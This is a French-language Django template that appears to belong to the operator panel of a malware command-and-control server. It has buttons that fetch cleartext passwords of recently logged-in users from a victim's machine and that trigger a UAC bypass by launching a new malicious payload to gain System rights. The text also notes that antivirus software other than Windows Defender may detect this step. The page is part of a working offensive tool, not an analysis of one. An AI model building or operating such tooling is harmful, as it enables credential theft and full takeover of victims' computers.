{% extends "server/session.html" %}
{% block session_content %}

{% if not is_system %}
    <div class="alert alert-warning" role="alert">
       Afin d'utiliser cette fonctionnalité, votre session doit s'exécuter avec les privilèges <code>Système</code>.
    </div>
{% else %}

    <p>Vous pouvez accéder aux mots de passe en clair des utilisateurs s'étant connectés récemment.</p>

    <div class="text-center">
        <button id="load_passwords" class="btn btn-primary">Récupérer les mots de passe</button>
    </div>

    <div id="loader" class="text-center mt-5 text-primary" style="display: none">
        <i class="fas fa-spinner fa-spin fa-3x"></i>
    </div>

    <pre id="passwords" style="display: none">

    </pre>

    <script type="text/javascript">
        $(function(){
		function loadPasswords() {
			$('#load_passwords').hide();
			$('#loader').show();
			$.ajax({
				url: "{% url "session_passwords_async" id %}",
			}).done(function(result) {
				var text = result.value;
	                        $('#passwords').text(text);
                $('#loader').hide();
                $('#passwords').show();
			});
		}

		$('#load_passwords').on('click', loadPasswords);
		
	});
    </script>


{% endif %}


{% if not is_system %}	
    <p>Votre session n'a pas les privilèges nécessaires.</p>
	<p>Si le compte sur lequel le logiciel malveillant est exécuté est administrateur, il est possible de récupérer des droits plus importants sur la machine victime. </p>
    <p>Cliquer sur "Devenir système" déclenche l'exécution d'une nouvelle charge malveillante avec les droits administrateur. </p>
    <div class="alert alert-danger">
        Si un antivirus autre que Windows Defender est installé, cette action peut être détectée. 
    </div>
    <p> 
        Si l'action réussie, une nouvelle session sera accessible après quelques dizaines de secondes. Rechargez fréquemment la page "Sessions" jusqu'à son apparition.
    </p>
	<p class="text-center"><button class="btn btn-warning" id="bypassUAC_button">Devenir système</button></p> 		
	
	<div id="loader" class="text-center mt-5 text-warning" style="display: none">
	        <i class="fas fa-spinner fa-spin fa-3x"></i>
		<p id="loader-text" class="mt-3">Chargement en cours...</p>
   	 </div>

	<script type="text/javascript">
        $(function(){
                function bypassUAC() {
                        $('#bypassUAC_button').hide();
                        $('#loader').show();
                        $.ajax({
                                url: "{% url "session_getadmin" id %}",
                        }).done(function(result) {
				setTimeout(function() {
					window.location = "{% url "sessions" %}";
				}, 8000);
				$('#loader-text').text("Création d'une nouvelle session...");
                        });
                }

                $('#bypassUAC_button').on('click', bypassUAC);

        });
    </script>

{% endif %}



{% endblock %}
